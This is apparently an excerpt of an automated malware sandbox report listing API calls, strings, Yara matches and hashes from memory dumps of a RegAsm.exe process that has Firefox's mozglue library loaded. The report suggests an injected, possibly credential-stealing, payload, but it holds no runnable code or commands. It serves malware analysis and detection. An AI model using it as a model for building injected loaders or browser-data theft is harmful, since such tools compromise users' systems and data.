                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
                                                                                    • String ID:
                                                                                    • API String ID: 373919974-0
                                                                                    • Opcode ID: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                                    • Instruction ID: 6a8f297f6f97b9a3cf0514685df13ca52355f4dbaeb7c4ae4b28d527b4ace486
                                                                                    • Opcode Fuzzy Hash: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                                    • Instruction Fuzzy Hash: 5E01C031C00249DBCF20EBA8C9827EEBBB0EF40354F10411AE854A3281C7385B84C7D6
                                                                                    APIs
                                                                                    • SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FolderPathlstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1699248803-0
                                                                                    • Opcode ID: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                                    • Instruction ID: 14537dfbc9dced5e712fe60e3e3a31c8263f1f5987e60415cd97e08317604fbc
                                                                                    • Opcode Fuzzy Hash: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                                    • Instruction Fuzzy Hash: 27F01C7990014CBBDB51DB64C8909EDB7FDEBC4704F0091A6A90593280D6349F459B50
                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocLocal
                                                                                    • String ID:
                                                                                    • API String ID: 3494564517-0
                                                                                    • Opcode ID: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                                    • Instruction ID: 7dcd19726911a1004ec6e1e6dff555a45da34f101be8258439f6e1c6d27db954
                                                                                    • Opcode Fuzzy Hash: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                                    • Instruction Fuzzy Hash: AAF05C35601610DB871209599C00AE7775BABC6B10708411BDE8C8B304C5B0ECC142E0
                                                                                    APIs
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C70F09B
                                                                                      • Part of subcall function 6C6E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5B85
                                                                                      • Part of subcall function 6C6E5B50: EnterCriticalSection.KERNEL32(6C74F688,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5B90
                                                                                      • Part of subcall function 6C6E5B50: LeaveCriticalSection.KERNEL32(6C74F688,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5BD8
                                                                                      • Part of subcall function 6C6E5B50: GetTickCount64.KERNEL32 ref: 6C6E5BE4
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C70F0AC
                                                                                      • Part of subcall function 6C6E5C50: GetTickCount64.KERNEL32 ref: 6C6E5D40
                                                                                      • Part of subcall function 6C6E5C50: EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6E5D67
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C70F0BE
                                                                                      • Part of subcall function 6C6E5C50: __aulldiv.LIBCMT ref: 6C6E5DB4
                                                                                      • Part of subcall function 6C6E5C50: LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C6E5DED
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C70F155
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F1E0
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F1ED
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F212
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F229
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F231
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C70F248
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F2AE
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F2BB
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F2F8
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F350
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F35D
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F381
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F398
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F3A0
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F489
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F491
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C70F3CF
                                                                                      • Part of subcall function 6C70F070: GetCurrentThreadId.KERNEL32 ref: 6C70F440
                                                                                      • Part of subcall function 6C70F070: AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F44D
                                                                                      • Part of subcall function 6C70F070: ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F472
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C70F4A8
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F559
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F561
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F577
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F585
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F5A3
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C70F3A8
                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C70F56A
                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C70F499
                                                                                    • [I %d/%d] profiler_resume, xrefs: 6C70F239
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                    • API String ID: 565197838-2840072211
                                                                                    • Opcode ID: 32d67070f367bb0ea6d45767cc66caad8cb9f0d1fb08b314455e2101d3c6c7b5
                                                                                    • Instruction ID: 2bbf6a72a81e9fa62ce3bed21166482b97d739711bfe4e755c8e61d0228e7820
                                                                                    • Opcode Fuzzy Hash: 32d67070f367bb0ea6d45767cc66caad8cb9f0d1fb08b314455e2101d3c6c7b5
                                                                                    • Instruction Fuzzy Hash: 6ED1E7757042149FDB00AF79D5087AA77F9EB8632CF10853BE97543B81DB705908C7AA
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6D64DF
                                                                                    • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6D64F2
                                                                                    • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C6D6505
                                                                                    • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C6D6518
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C6D652B
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6D671C
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6D6724
                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C6D672F
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6D6759
                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C6D6764
                                                                                    • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C6D6A80
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6D6ABE
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D6AD3
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6D6AE8
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6D6AF7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                    • API String ID: 487479824-2878602165
                                                                                    • Opcode ID: 6fc18b5f4b3d3b27d7fdb9b00f7fef0a13feee3f6e901162aa26f852dc123bec
                                                                                    • Instruction ID: e144071ab1ea08fceb18639577190882721ec69b720542bfdc19f0968b511b7e
                                                                                    • Opcode Fuzzy Hash: 6fc18b5f4b3d3b27d7fdb9b00f7fef0a13feee3f6e901162aa26f852dc123bec
                                                                                    • Instruction Fuzzy Hash: EBF1E1709012298FDB20DF24CD88B9AB7B5AF46318F1586E9D809E7681D731FE84CF94
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C6EEE7A
                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C6EEFB5
                                                                                    • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C6F1695
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6F16B4
                                                                                    • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C6F1770
                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6F1A3E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset$freemallocmemcpy
                                                                                    • String ID: ~qll$~qll
                                                                                    • API String ID: 3693777188-3932955011
                                                                                    • Opcode ID: 9675f19105f122765f5803ddf9dbc7164a2f158c485bbf7e9567901840ec2172
                                                                                    • Instruction ID: 8874348b1b8989a8745e91b24bed29cacf012e1c856ec2cf9fa723faba7bc605
                                                                                    • Opcode Fuzzy Hash: 9675f19105f122765f5803ddf9dbc7164a2f158c485bbf7e9567901840ec2172
                                                                                    • Instruction Fuzzy Hash: EAB31971E05219CFCB14CFA8C890ADDB7B2BF89304F2582A9D459AB745D730AD86CF94
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E744), ref: 6C6D7885
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E744), ref: 6C6D78A5
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784), ref: 6C6D78AD
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6D78CD
                                                                                    • EnterCriticalSection.KERNEL32(6C74E7DC), ref: 6C6D78D4
                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C6D78E9
                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 6C6D795D
                                                                                    • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C6D79BB
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C6D7BBC
                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C6D7C82
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E7DC), ref: 6C6D7CD2
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C6D7DAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeavememset
                                                                                    • String ID: Dtl$Dtl
                                                                                    • API String ID: 759993129-1464740658
                                                                                    • Opcode ID: f1bacd7f4bddd3a4df88049ee005886a3ff2b4f3ac0f447f0d3799d779325362
                                                                                    • Instruction ID: fe01a28e93e1caa5a51fdd2fcc3104c113a7ba9323465acb8aa37f21515668e4
                                                                                    • Opcode Fuzzy Hash: f1bacd7f4bddd3a4df88049ee005886a3ff2b4f3ac0f447f0d3799d779325362
                                                                                    • Instruction Fuzzy Hash: F1027271E012198FDB54CF29D984799B7B5FF88318F2682AAD809A7715D730BE90CF84
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpystrlen
                                                                                    • String ID: (pre-xul)$data$name$schema$vtl
                                                                                    • API String ID: 3412268980-3627326370
                                                                                    • Opcode ID: fe1f7113af2cd6e5bc267d8bf88e97e57d2e2c54780e7081c6e6e90bc538555a
                                                                                    • Instruction ID: 50ea9f842e9826b6e2e5369dcf3c9684b20bef1e3290a6e8069de171d5d346f7
                                                                                    • Opcode Fuzzy Hash: fe1f7113af2cd6e5bc267d8bf88e97e57d2e2c54780e7081c6e6e90bc538555a
                                                                                    • Instruction Fuzzy Hash: BCE18FB1B043448BC710CF68894065BF7E9FF89314F15892DE899D7791DBB0ED098B96
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED4F2
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED50B
                                                                                      • Part of subcall function 6C6CCFE0: EnterCriticalSection.KERNEL32(6C74E784), ref: 6C6CCFF6
                                                                                      • Part of subcall function 6C6CCFE0: LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6CD026
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED52E
                                                                                    • EnterCriticalSection.KERNEL32(6C74E7DC), ref: 6C6ED690
                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C6ED6A6
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E7DC), ref: 6C6ED712
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED751
                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C6ED7EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                    • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                    • API String ID: 2690322072-3894294050
                                                                                    • Opcode ID: 8ac13ab25e8ffe613973c8081609244a3c48f1ad85d8ab51e83c3f3f2553d09c
                                                                                    • Instruction ID: c8120b5d886e4c483d9b05827560bb1adb690907e6b29813fec18eb439a7598a
                                                                                    • Opcode Fuzzy Hash: 8ac13ab25e8ffe613973c8081609244a3c48f1ad85d8ab51e83c3f3f2553d09c
                                                                                    • Instruction Fuzzy Hash: D991D171A097058FD714DF39C19076AB7E1EBC9328F15892FE5AA87A81D730E844CB86
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(000007D0), ref: 6C724EFF
                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C724F2E
                                                                                    • moz_xmalloc.MOZGLUE ref: 6C724F52
                                                                                    • memset.VCRUNTIME140(00000000,00000000), ref: 6C724F62
                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7252B2
                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7252E6
                                                                                    • Sleep.KERNEL32(00000010), ref: 6C725481
                                                                                    • free.MOZGLUE(?), ref: 6C725498
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                    • String ID: (
                                                                                    • API String ID: 4104871533-3887548279
                                                                                    • Opcode ID: 94f6b2a99bd6317d417a61c115a65baa70374fd67276d1601177c9c8666a4df5
                                                                                    • Instruction ID: c0155ba2fcbd351ec2c7c296c4eada7acc3d89720e66d624473c683c2f81acd4
                                                                                    • Opcode Fuzzy Hash: 94f6b2a99bd6317d417a61c115a65baa70374fd67276d1601177c9c8666a4df5
                                                                                    • Instruction Fuzzy Hash: 7EF1B171A19B408FC716DF39C85062BB7F9AFD6284F05873EF84AA7651DB31D8428B81
                                                                                    APIs
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C7051DF
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C70529C
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C7052FF
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C70536D
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C7053F7
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C7056C3
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7056E0
                                                                                    Strings
                                                                                    • MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C7056BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
                                                                                    • String ID: MOZ_PROFILER_RECORD_OVERHEADS
                                                                                    • API String ID: 1227157289-345010206
                                                                                    • Opcode ID: 73d15f2ac2eadd4cf55b1d70dd7607aa3d1dfab18dca193b3b2d7635601650a1
                                                                                    • Instruction ID: d0644920a39dc61982d633d91d267083d4699d5ff9b2c171dcc021c15c6b8e5b
                                                                                    • Opcode Fuzzy Hash: 73d15f2ac2eadd4cf55b1d70dd7607aa3d1dfab18dca193b3b2d7635601650a1
                                                                                    • Instruction Fuzzy Hash: 6FE1ADB1A14F45CAC712DF359810267B7FABF9B385F10DB1EE8AF2A901DB30A4468305
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32 ref: 6C727046
                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C727060
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C72707E
                                                                                      • Part of subcall function 6C6D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6D81DE
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C727096
                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C72709C
                                                                                    • LocalFree.KERNEL32(?), ref: 6C7270AA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                    • String ID: ### ERROR: %s: %s$(null)
                                                                                    • API String ID: 2989430195-1695379354
                                                                                    • Opcode ID: 34ba64ea25a2ff5a336485615c2faa717091ebc73ae302cbdb58694bd903eb42
                                                                                    • Instruction ID: f5333a67f582d61ddd4578f66c3ed9852c9d8836712c7d0503b22cbf2c6e0c4a
                                                                                    • Opcode Fuzzy Hash: 34ba64ea25a2ff5a336485615c2faa717091ebc73ae302cbdb58694bd903eb42
                                                                                    • Instruction Fuzzy Hash: EE01B9B2A00118AFDB00ABA4DC4ADAF7BBCEF49219F014436FA05A3241D6717D188BE5
                                                                                    APIs
                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C712C31
                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C712C61
